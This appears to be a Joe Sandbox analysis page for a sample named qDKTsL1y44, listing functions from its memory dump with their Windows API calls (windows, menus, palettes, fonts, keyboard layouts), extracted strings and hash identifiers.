Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
String ID:
API String ID: 2976466617-0
Opcode ID: 6c56df06b27f2583b834b9f899bdec3a56236d737596b226553d088fbb263a8f
Instruction ID: 41449d9bf96a623256bd2d0b76cab5fee7721e73e3b117d9542c8740f0c319cd
Opcode Fuzzy Hash: 6c56df06b27f2583b834b9f899bdec3a56236d737596b226553d088fbb263a8f
Instruction Fuzzy Hash: 31410A75B10609AFEB10DA98C9C1FAEB7F9EB58304F1141A0F614EB2A1C775BE41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04233BBC Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 04233BE2
IsWindowUnicode.USER32(00000000), ref: 04233C25
SendMessageW.USER32(00000000,-0000BBEE,029F67A0,?), ref: 04233C40
SendMessageA.USER32(00000000,-0000BBEE,029F67A0,?), ref: 04233C5F
GetWindowThreadProcessId.USER32(00000000), ref: 04233C6E
GetWindowThreadProcessId.USER32(?,?), ref: 04233C7C
SendMessageA.USER32(00000000,-0000BBEE,029F67A0,?), ref: 04233C9C

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode
String ID:
API String ID: 1994056952-0
Opcode ID: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
Instruction ID: 39cbf33ad7c1e9ceab3490829c3e88012e217a01956cae4e50f011492b085252
Opcode Fuzzy Hash: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
Instruction Fuzzy Hash: 1021A3B532460A6FE760FAA9CD80F67B3ECEF44A15B144C24FD69C3641D711F9208720

Uniqueness

Uniqueness Score: -1.00%

Function 04203A48 Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 04203A76
GetDeviceCaps.GDI32(?,00000068), ref: 04203A92
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 04203AB1
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 04203AD5
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 04203AF3
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 04203B07
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 04203B27
ReleaseDC.USER32(00000000,?), ref: 04203B3F

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease
String ID:
API String ID: 1781840570-0
Opcode ID: 57a3148656119fe1da27c9ee08a383b4796e4f562756e8997d1c2ddfcc9a8337
Instruction ID: 517bea6716cc6c9cb8fa33b0f853024347b0e75c8abaf28df7115366dbba2ec1
Opcode Fuzzy Hash: 57a3148656119fe1da27c9ee08a383b4796e4f562756e8997d1c2ddfcc9a8337
Instruction Fuzzy Hash: 30214FB5A40608BFEB10DBA5CD85FAEB3BCEB08708F904591BB44E61C0D775BE408B25

Uniqueness

Uniqueness Score: -1.00%

Function 0420F99C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 177windowCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,0420FBED), ref: 0420FA38
InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0420FB41

Part of subcall function 0420FEA0: CreatePopupMenu.USER32 ref: 0420FEBB

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 0420FBCA

Part of subcall function 0420FEA0: CreateMenu.USER32 ref: 0420FEC5

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 0420FBB1

Strings

,, xrefs: 0420FA4C
?, xrefs: 0420FA53

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 6153df75111270bf0b006fcef49dafb4e58cdff0159f412e5b713cc9db9d58a9
Instruction ID: 7704f93f081f3bbdae2c57bf37ae85ca8c1646d5446d9cbf8b22abe8ca7e8d8f
Opcode Fuzzy Hash: 6153df75111270bf0b006fcef49dafb4e58cdff0159f412e5b713cc9db9d58a9
Instruction Fuzzy Hash: 3D612634B242449BEB20EF69D9C066A7BF9EF0A304B4581A5E950E7296D378FD41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04223708 Relevance: 10.7, APIs: 7, Instructions: 162COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,042238EC), ref: 042237ED
GetTickCount.KERNEL32 ref: 042237F2
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 04223836
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0422384E
AnimateWindow.USER32(00000000,00000064,?), ref: 04223893
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,042238EC), ref: 042238B6

Part of subcall function 04226EC8: GetCursorPos.USER32(?), ref: 04226ECC

GetTickCount.KERNEL32 ref: 042238D3

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: 37eb72ade3fc119b51de1ef4f780528d2b525a61f2a29450dc24d43aaf39ba16
Instruction ID: 20cfce6728aa40ad320a36f1b5c1c34c0ec22fe6dea45579f7cbaca2b03c41a3
Opcode Fuzzy Hash: 37eb72ade3fc119b51de1ef4f780528d2b525a61f2a29450dc24d43aaf39ba16
Instruction Fuzzy Hash: 05511678B10205EFEB10DFA8CA85AAEB7F5EF49304F2445A0E900EB254D774BE41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 042340FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138windowCOMMON

Download Yara Rule

APIs

Part of subcall function 042354A8: GetActiveWindow.USER32 ref: 042354CF
Part of subcall function 042354A8: GetLastActivePopup.USER32(?), ref: 042354E1

GetWindowRect.USER32(?,?), ref: 0423417E
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 042341B6
MessageBoxA.USER32(00000000,?,?,?), ref: 042341F5
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0423426B), ref: 04234245
SetActiveWindow.USER32(00000000,0423426B), ref: 04234256

Strings

(, xrefs: 0423415B

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Window$Active$LastMessagePopupRect
String ID: (
API String ID: 3456420849-3887548279
Opcode ID: 3689cd5adc925f3079d9f282cd70ef5089ffc5460462c658c3bdef92b89ddb3e
Instruction ID: 018df38b17a2f7c361f8cdb0a0e39a54b4b970164adb7a3852370e9ff3a5a0ff
Opcode Fuzzy Hash: 3689cd5adc925f3079d9f282cd70ef5089ffc5460462c658c3bdef92b89ddb3e
Instruction Fuzzy Hash: 4E51F8B5B10619AFEB04EFA8DD81FAEB7B8FB48705F144495E500EB391D674BD008B50

Uniqueness

Uniqueness Score: -1.00%

Function 042319D8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,04231B83,?,029FD9D0,?,04231BE5,00000000,?,0421D22F), ref: 04231A2E
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 04231A96
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,04231B3F,?,80000002,00000000), ref: 04231AD0
RegCloseKey.ADVAPI32(?,04231B46,00000000,?,00000100,00000000,04231B3F,?,80000002,00000000), ref: 04231B39

Strings

System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 04231A80
layout text, xrefs: 04231AC7

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-2652665750
Opcode ID: 6fa178af82021582a4a451db4550715d3b17759a3b40b2e13422b929fa0ccaab
Instruction ID: a9042198bb65c7a3867d9fd37a4dd093e3cd305964958480e952a969fb7ba80c
Opcode Fuzzy Hash: 6fa178af82021582a4a451db4550715d3b17759a3b40b2e13422b929fa0ccaab
Instruction Fuzzy Hash: 744145B8A10609AFEB10DF95C981BAEB7F9EB48704F9140E1E904A7251E770BE54CF61

Uniqueness

Uniqueness Score: -1.00%

Function 04233DEC Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 04233E00
IsWindowUnicode.USER32 ref: 04233E14
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04233E35
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 04233E4B
TranslateMessage.USER32 ref: 04233ED4
DispatchMessageW.USER32 ref: 04233EE0
DispatchMessageA.USER32 ref: 04233EE8

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
Instruction ID: 9a86b6fabeb5db793a1bbc92d176e8f0f38e2e0232c312a8ba640c9e73889254
Opcode Fuzzy Hash: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
Instruction Fuzzy Hash: C92126B072834167FA31FA294D41BBB93B94F92B4AF144459FD80D71C2D7E6B646C212

Uniqueness

Uniqueness Score: -1.00%

Function 0422D0F0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 0422D161
GetWindowLongA.USER32(00000000,000000EC), ref: 0422D173
GetClassLongA.USER32(00000000,000000E6), ref: 0422D186
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0422D1C6
SetWindowLongA.USER32(00000000,000000EC,?), ref: 0422D1DA
SetClassLongA.USER32(00000000,000000E6,?), ref: 0422D1EE
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 0422D20A

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Long$Window$Class
String ID:
API String ID: 2026531576-0
Opcode ID: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
Instruction ID: 8c5e23ab84da8512c2718ac46fc0aa710d4193ccdddbd105985b160ac8c85c78
Opcode Fuzzy Hash: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
Instruction Fuzzy Hash: 8821033432826276FA01A73C8D88ABEB7896F8131CF084744B474E72E1CBB4F851D741

Uniqueness

Uniqueness Score: -1.00%

Function 04231D24 Relevance: 10.6, APIs: 7, Instructions: 89COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 04231D79
CreateFontIndirectA.GDI32(?), ref: 04231D86
GetStockObject.GDI32(0000000D), ref: 04231D9C

Part of subcall function 04202518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04202525

SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 04231DC5
CreateFontIndirectA.GDI32(?), ref: 04231DD5
CreateFontIndirectA.GDI32(?), ref: 04231DEE
GetStockObject.GDI32(0000000D), ref: 04231E14

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 0e61e40688a7d5621c51d9450e476d0e177e14965555bbdeb200e4a5208831bb
Instruction ID: 86b3026c700b92ee7831db5ae094bc23f063ae4018e625730cb5641b5bfa39db
Opcode Fuzzy Hash: 0e61e40688a7d5621c51d9450e476d0e177e14965555bbdeb200e4a5208831bb
Instruction Fuzzy Hash: 0F31CF707556459BFB54EB68DD89BA933F8EB44305F8480F1A948CB286DF78BC05CB20

Uniqueness

Uniqueness Score: -1.00%

Function 04236C70 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 041EC91C: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,041EC9F2), ref: 041EC95E
Part of subcall function 041EC91C: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,041EC9D5,?,00000000,?,00000000,041EC9F2), ref: 041EC993
Part of subcall function 041EC91C: VerQueryValueA.VERSION(?,041ECA04,?,?,00000000,?,00000000,?,00000000,041EC9D5,?,00000000,?,00000000,041EC9F2), ref: 041EC9AD

GetModuleHandleA.KERNEL32(comctl32.dll), ref: 04236CA4
GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 04236CB5
ImageList_Write.COMCTL32(00000000,?,00000000,04236D6A), ref: 04236D34

Strings

comctl32.dll, xrefs: 04236C9F
comctl32.dll, xrefs: 04236C84
ImageList_WriteEx, xrefs: 04236CAF

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
API String ID: 4063495462-3125200627
Opcode ID: 274c631e4b578dfafa2cd9944565233d7b67322c74337dd2e60513f9f4aac90d
Instruction ID: c90cba8ffba1ab71cedaba95e77c2abf8d0292da891e90dc81b0de643c58be00
Opcode Fuzzy Hash: 274c631e4b578dfafa2cd9944565233d7b67322c74337dd2e60513f9f4aac90d
Instruction Fuzzy Hash: 7B2174B4320745BBE720AF7AEC88B2D77BDEB4471AB400464F905D7251DB76BC40DA20

Uniqueness

Uniqueness Score: -1.00%

Function 04213008 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(00000000), ref: 04213030

Part of subcall function 042002A4: RegCloseKey.ADVAPI32(10940000,04200180,00000001,04200222,?,?,042076BA,00000008,00000060,00000048,00000000,0420775F), ref: 042002B8

Part of subcall function 04200308: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,042004A2), ref: 04200374

Part of subcall function 041EDC04: SetErrorMode.KERNEL32 ref: 041EDC0E
Part of subcall function 041EDC04: LoadLibraryA.KERNEL32(00000000,00000000,041EDC58,?,00000000,041EDC76), ref: 041EDC3D

GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 042130C1
FreeLibrary.KERNEL32(?,042130FB,?,00000000,0421313B), ref: 042130EE

Strings

KbdLayerDescriptor, xrefs: 042130B8
Layout File, xrefs: 0421308D
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 04213075

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
API String ID: 3365787578-2194312379
Opcode ID: ebc781996fc85c6c72d49e2a4b1c4689d1efd4746f69a9eafa970c265c40328b
Instruction ID: 5bad3e7d3474b630288de2ca35f7a0616dab39ea13379ec921051bfdc2e44a44
Opcode Fuzzy Hash: ebc781996fc85c6c72d49e2a4b1c4689d1efd4746f69a9eafa970c265c40328b
Instruction Fuzzy Hash: 0D21A174F10649AFFF01EFA5D8919AEBBFAFB49304F418464E810A7650DB39B941CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0420B0A4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0420B0FC
GetSystemMetrics.USER32(00000000), ref: 0420B111
GetSystemMetrics.USER32(00000001), ref: 0420B11C
lstrcpyA.KERNEL32(?,DISPLAY), ref: 0420B146

Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23

Strings

GetMonitorInfoA, xrefs: 0420B0BC
DISPLAY, xrefs: 0420B13D

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: aab60616642a426f534bb9479afd783ac48a2770f36875d74648a2ee6f8f1ad1
Instruction ID: 01dbee1bf26ac9088cf5c38acb02a4616c57fda3080916902de2cd68b2fd1eed
Opcode Fuzzy Hash: aab60616642a426f534bb9479afd783ac48a2770f36875d74648a2ee6f8f1ad1
Instruction Fuzzy Hash: 2B11D631B107159FE730CFA8AC887ABFBE9EB05761F008529ED5597281D3B4B844CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0420B178 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0420B1D0
GetSystemMetrics.USER32(00000000), ref: 0420B1E5
GetSystemMetrics.USER32(00000001), ref: 0420B1F0
lstrcpyA.KERNEL32(?,DISPLAY), ref: 0420B21A

Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23

Strings

DISPLAY, xrefs: 0420B211
GetMonitorInfoW, xrefs: 0420B190

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW
API String ID: 2545840971-2774842281
Opcode ID: c7aa6fcb9c59fb0474afcf16bd34d2cddc1264bb0efb2d50b0b9d66a3351442c
Instruction ID: e6a7a918d463eb5247d0577beea606e82eee3d987fddb89b6964e9a116f101bf
Opcode Fuzzy Hash: c7aa6fcb9c59fb0474afcf16bd34d2cddc1264bb0efb2d50b0b9d66a3351442c
Instruction Fuzzy Hash: A9117531B117116FD730DFA9A844B7BBBE9EB05761F008529ED55E7281D774B804CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04204E74 Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 04203C9C: GetObjectA.GDI32(?,00000004), ref: 04203CB3
Part of subcall function 04203C9C: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 04203CD6

GetDC.USER32(00000000), ref: 04204EB2
CreateCompatibleDC.GDI32(?), ref: 04204EBE
SelectObject.GDI32(?), ref: 04204ECB
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,04204F23,?,?,?,?,00000000), ref: 04204EEF
SelectObject.GDI32(?,?), ref: 04204F09
DeleteDC.GDI32(?), ref: 04204F12
ReleaseDC.USER32(00000000,?), ref: 04204F1D

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
String ID:
API String ID: 4046155103-0
Opcode ID: 8ae3c00dcd804de0e0e0891d890c0c8737fd3250cb0001d8aeb557dbe9386622
Instruction ID: ce3c773e74867ce570d3d9c1b1726458c0ca10de61aa59aa85ee36a5f1b46942
Opcode Fuzzy Hash: 8ae3c00dcd804de0e0e0891d890c0c8737fd3250cb0001d8aeb557dbe9386622
Instruction Fuzzy Hash: C0112475E146096BEB10EBE5CC95AADB3FCEB08704F8084A5BA04D7281D775B9408B90

Uniqueness

Uniqueness Score: -1.00%

Function 04231C88 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 04231CA3
WindowFromPoint.USER32(?,?), ref: 04231CB0
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 04231CBE
GetCurrentThreadId.KERNEL32 ref: 04231CC5
SendMessageA.USER32(00000000,00000084,00000000,?), ref: 04231CEE
SendMessageA.USER32(00000000,00000020,00000000,?), ref: 04231D00
SetCursor.USER32(00000000), ref: 04231D12

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
Instruction ID: 1d38d688fcb98c370715d2efbb04658ab092d599cf3903b384d6d595082522c4
Opcode Fuzzy Hash: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
Instruction Fuzzy Hash: 9201F56931474175E7212B658CC0F3F76B8DFC6A4AF144429F988DA191E725FC119326

Uniqueness

Uniqueness Score: -1.00%

Function 041EBFC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 041EBE3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 041EBE59
Part of subcall function 041EBE3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 041EBE7D
Part of subcall function 041EBE3C: GetModuleFileNameA.KERNEL32(041E0000,?,00000105), ref: 041EBE98
Part of subcall function 041EBE3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 041EBF2E

CharToOemA.USER32(?,?), ref: 041EBFFB
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 041EC018
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 041EC01E
GetStdHandle.KERNEL32(000000F4,041EC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 041EC033
WriteFile.KERNEL32(00000000,000000F4,041EC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 041EC039
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 041EC05B
